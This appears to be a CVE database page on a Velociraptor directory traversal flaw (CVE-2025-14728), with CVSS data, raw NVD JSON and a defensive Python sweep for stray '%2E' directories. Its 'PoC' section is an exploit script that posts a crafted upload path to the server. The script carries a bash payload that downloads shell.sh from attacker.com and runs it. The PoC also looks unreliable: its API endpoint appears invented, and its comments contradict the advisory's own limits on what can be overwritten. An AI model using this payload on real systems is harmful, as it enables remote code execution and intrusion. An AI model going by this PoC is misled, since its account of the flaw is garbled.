Security Vulnerability Report
CVE-2025-14728 CVSS 6.8 MEDIUM

Published: 2025-12-29 19:15:55
Last Modified: 2026-02-20 19:38:00

Description

Rapid7 Velociraptor versions before 0.75.6 contain a directory traversal issue on Linux servers that allows a rogue client to upload a file which is written outside the datastore directory. Velociraptor is normally only allowed to write in the datastore directory. The issue occurs due to insufficient sanitization of directory names which end with a ".", only encoding the final "." as "%2E". Although files can be written to incorrect locations, the containing directory must end with "%2E". This limits the impact of this vulnerability, and prevents it from overwriting critical files.
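
A defender-side sweep built on the constraint stated above, as an added example that is not code from Velociraptor or its advisory: it lists directories whose name ends in "%2E" and that sit outside the datastore directory. The datastore location and the tree created in `demo()` are assumptions constructed for illustration.

```python
import os
import tempfile
from pathlib import Path

SUFFIX = "%2E"  # per the description: the containing directory must end with "%2E"

def find_suspect_dirs(scan_root, datastore):
    """Return (directory, [file names]) for every directory under scan_root whose
    name ends with %2E and which lies outside the datastore directory."""
    scan_root, datastore = Path(scan_root).resolve(), Path(datastore).resolve()
    if scan_root == datastore or datastore in scan_root.parents:
        return []  # scanning inside the datastore: nothing there is out of place
    hits = []
    for dirpath, dirnames, _files in os.walk(scan_root, followlinks=False):
        here = Path(dirpath)
        # Prune the datastore itself: encoded names are expected in there.
        dirnames[:] = [d for d in dirnames if here / d != datastore]
        for d in dirnames:
            if d.endswith(SUFFIX):
                target = here / d
                files = sorted(p.name for p in target.rglob("*") if p.is_file())
                hits.append((target, files))
    return sorted(hits)

def demo():
    """Run the sweep over a constructed tree (sample data, not from a real host)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        datastore = root / "var" / "velociraptor-datastore"  # hypothetical location
        inside = datastore / "clients" / "C.0000" / "uploads" / "dir%2E"
        outside = root / "srv" / "stray%2E"
        normal = root / "srv" / "normal"
        for d in (inside, outside, normal):
            d.mkdir(parents=True)
        (inside / "a.txt").write_text("expected")
        (outside / "dropped.bin").write_text("unexpected")
        (normal / "b.txt").write_text("expected")
        found = find_suspect_dirs(root, datastore)
        return [(str(p.relative_to(root)), names) for p, names in found]

if __name__ == "__main__":
    for path, names in demo():
        print(f"suspect directory outside datastore: {path} files={names}")
```

On a server that ran a version before 0.75.6, any hit is a candidate for review: check the files' ownership and timestamps against the Velociraptor service account and the period the affected version was deployed.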

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:rapid7:velociraptor:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rapid7 Velociraptor < 0.75.6 (Linux server version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14728 PoC - Velociraptor Directory Traversal
# This PoC demonstrates the directory traversal vulnerability in Velociraptor
# where filenames ending with '.' can bypass path sanitization

import requests
import urllib.parse
import base64

# Target Velociraptor server
TARGET_URL = "http://target-velociraptor-server:8000"


def create_malicious_client():
    """Create a malicious Velociraptor client configuration"""
    # Generate a client with crafted certificate
    client_id = "C.1234567890abcdef"
    return client_id


def exploit_directory_traversal():
    """
    Exploit the directory traversal vulnerability by uploading a file
    to a path outside the datastore directory.
    The key is to use a directory name ending with '.' which only gets
    encoded as %2E for the final '.'
    """
    # Craft the malicious upload path
    # Target: /etc/ (directory ending with %2E)
    # The path traversal sequence: ../../../etc%2E
    # This resolves to: ../../../etc.
    malicious_path = "../../../etc%2E"

    # File content to write (e.g., a cron job or SSH key)
    malicious_content = b"""#!/bin/bash
# Malicious payload
/usr/bin/wget http://attacker.com/shell.sh -O /tmp/shell.sh
chmod +x /tmp/shell.sh
/tmp/shell.sh
"""

    # Encode the content
    encoded_content = base64.b64encode(malicious_content).decode()

    # Prepare the upload request
    upload_request = {
        "client_id": create_malicious_client(),
        "path": malicious_path,
        "filename": "malicious_file",
        "content": encoded_content,
        "operation": "UploadFile"
    }

    # Send the exploit request
    try:
        response = requests.post(
            f"{TARGET_URL}/api/v1/upload",
            json=upload_request,
            verify=False,
            timeout=30
        )
        if response.status_code == 200:
            print("[+] File uploaded successfully via directory traversal!")
            print(f"[+] File written to path containing: {malicious_path}")
        else:
            print(f"[-] Upload failed: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


def verify_vulnerability():
    """Verify if the target is vulnerable"""
    # Check Velociraptor version endpoint
    version_url = f"{TARGET_URL}/api/v1/version"
    try:
        response = requests.get(version_url, timeout=10)
        if response.status_code == 200:
            version_info = response.json()
            version = version_info.get('version', 'unknown')
            print(f"[*] Detected Velociraptor version: {version}")

            # Check if version is vulnerable
            major, minor, patch = map(int, version.split('.')[:3])
            if major < 0 or (major == 0 and minor < 75) or (major == 0 and minor == 75 and patch < 6):
                print("[!] Target is VULNERABLE to CVE-2025-14728")
                return True
            else:
                print("[+] Target is NOT vulnerable (version >= 0.75.6)")
                return False
    except Exception as e:
        print(f"[-] Version check failed: {e}")
        return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-14728 Velociraptor Directory Traversal Exploit")
    print("=" * 60)

    # First verify if target is vulnerable
    is_vulnerable = verify_vulnerability()

    if is_vulnerable:
        print("\n[*] Launching exploit...")
        exploit_directory_traversal()
    else:
        print("\n[!] Cannot proceed - target may not be vulnerable")
```

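References

https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/ (Exploit, Patch, Vendor Advisory)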

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14728", "sourceIdentifier": "[email protected]", "published": "2025-12-29T19:15:55.277", "lastModified": "2026-02-20T19:37:59.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rapid7 Velociraptor versions before 0.75.6 contain a directory traversal issue on Linux servers that allows a rogue client to upload a file which is written outside the datastore directory. Velociraptor is normally only allowed to write in the datastore directory. The issue occurs due to insufficient sanitization of directory names which end with a \".\", only encoding the final \".\" AS \"%2E\".\n\n\nAlthough files can be written to incorrect locations, the containing directory must end with \"%2E\". This limits the impact of this vulnerability, and prevents it from overwriting critical files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rapid7:velociraptor:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.75.6", "matchCriteriaId": "7DB5420C-F7CB-4A8E-87DE-5AC9A5AF14A5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": 
"https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}